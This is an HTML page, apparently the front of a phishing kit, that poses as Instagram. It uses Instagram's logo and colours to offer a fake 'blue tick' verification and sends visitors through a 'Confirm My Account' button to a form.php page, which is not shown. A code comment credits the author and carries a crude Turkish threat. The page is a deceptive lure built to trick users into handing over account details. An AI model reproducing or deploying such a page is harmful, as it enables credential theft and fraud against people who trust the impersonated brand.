<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <script src="https://kit.fontawesome.com/db109e88ef.js" crossorigin="anonymous"></script> 
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
	<link rel="shortcut icon" href="https://instagram.com/static/images/ico/xxxhdpi_launcher.png/9fc4bab7565b.png">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
	<style>
	@media screen and (min-width:1000px) {
#x{
	display: none;
}
#body{
	background: url("https://sm.mashable.com/mashable_in/news/i/instagram-/instagram-tests-a-serious-boomerang-upgrade_6fee.jpg?_nc_cat=101&_nc_sid=ad8a9d&_nc_ohc=HuasS5MxvVMAX8oDULj&_nc_ht=scontent.fgyd3-1.fna&oh=7702af732b488a8dddb2990364e18421&oe=5F63E3FF") no-repeat;
	background-size: cover;
	background-position: bottom;
	height: 100vh;
	text-align: center;
}
#header{
	width: 100%;
	padding-top: 30px;
}
#header img{
	width: 20%;
}
#content{
	margin-top: 15%;
}
#content i{
	font-size: 50px;
	color: #fff;
}
#content h1{
	color: white;
	font-size: 2em;
	padding-top: 20px;
		font-weight: 600;
}
#content p{
	color: white;
}
#content a{
	text-decoration: none;
	width: 20%;
	color: white;
	padding: 5px;
	display: block;
	border: 1px solid #fff;
	border-radius: 20px;
	font-weight: 600;
}
#content a:hover{
	background: black;
	border-color: black;
}
#footer{
	background: linear-gradient(7deg, #ffd521, #f50000 40%, #b900b4);
	color: #fff;
	padding: 10% 0px;
}
#footer img{
	width: 20px;
	margin: 5px;
}
#footer a{
	text-decoration: none;
	width: 15%;
	color: white;
	padding: 5px;
	display: inline-block;
	border: 2px solid #fff;
	border-radius: 20px;
	font-weight: 600;
}
.icon{
	display: inline-block;
	padding: 0px 7px;
}
}
@media screen and (max-width:1000px) {
	#body{
	background: url("https://sm.mashable.com/mashable_in/news/i/instagram-/instagram-tests-a-serious-boomerang-upgrade_6fee.jpg?_nc_cat=101&_nc_sid=ad8a9d&_nc_ohc=HuasS5MxvVMAX8oDULj&_nc_ht=scontent.fgyd3-1.fna&oh=7702af732b488a8dddb2990364e18421&oe=5F63E3FF") no-repeat;
	background-size: cover;
	background-position: bottom;
	height: 100vh;
	text-align: center;
}
#header{
	width: 100%;
	padding-top: 30px;
}
#header img{
	width: 40%;
}
#content{
	margin-top: 40%;
}
#content i{
	font-size: 40px;
	color: #fff;
}
#content h1{
	color: white;
	font-size: 1.5em;
	padding-top: 20px;
	font-weight: 600;
}
#content p{
	color: white;
	margin-top: 10px;
}
#content a{
	text-decoration: none;
	width: 50%;
	color: white;
	padding: 5px;
	display: block;
	border: 1px solid #fff;
	border-radius: 20px;
	margin-top: 20px;
	font-weight: 600;
}
#content a:hover{
	background: black;
	border-color: black;
}
#footer{
	background: linear-gradient(7deg, #ffd521, #f50000 40%, #b900b4);
	color: #fff;
	padding: 10% 15px;
	position: fixed;
	bottom: 0px;
}
#footer img{
	width: 15px;
	margin: 5px;
}
#footer h1{
	font-size: 1.5em;
}
#footer p{
	font-size: 0.7em;
}
#footer a{
	text-decoration: none;
	width: 40%;
	color: white;
	padding: 5px;
	display: inline-block;
	border: 2px solid #fff;
	border-radius: 20px;
	font-weight: 600;
	font-size: 15px;
}
.icon{
	display: inline-block;
	padding: 0px 7px;
}
#x{
	position: absolute;
	right: 5%;
	top: 5px;
	font-size: 20px;
	background: none;
	color: white;
	border: none;
	outline: none;
}
}
	</style>
    <title>Instagram</title>
  </head>
  <body>
    <div id="body">
		<div id="header">
			<img src="https://i.pinimg.com/originals/57/6c/dd/576cdd470fdc0b88f4ca0207d2b471d5.png">
		</div>
		<div id="content">
			<i class="fab fa-instagram"></i>
			<h1>İNSTAGRAM BLUE TİCK</h1>
			<p>Click to Confirm Your Account</p>
			<center><a href="form.php">Confirm My Account</a></center>
		</div>
	</div>
<div id="footer">
<button onClick="klaX()" id="x">X</button>
<center>
	<h1>Don’t miss a thing.</h1>
	<p>Stay up to date on success stories, news and tips from our business community.</p>
	<a href="https://www.instagram.com/instagram/">
		<div class="icon"><i class="fab fa-instagram"></i></div>Follow
	</a><!-- @psikopatcoder tarafından kodlanmıştır çalanı sikerim -->
	<a href="https://www.facebook.com/instagramforbusiness">
		<div class="icon"><i class="fab fa-facebook-f"></i></div>Follow
	</a>
</center>
</div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
	<script>
	function klaX(){ 
		document.getElementById("footer").style.display="none";
	}
	</script>
  </body>
</html>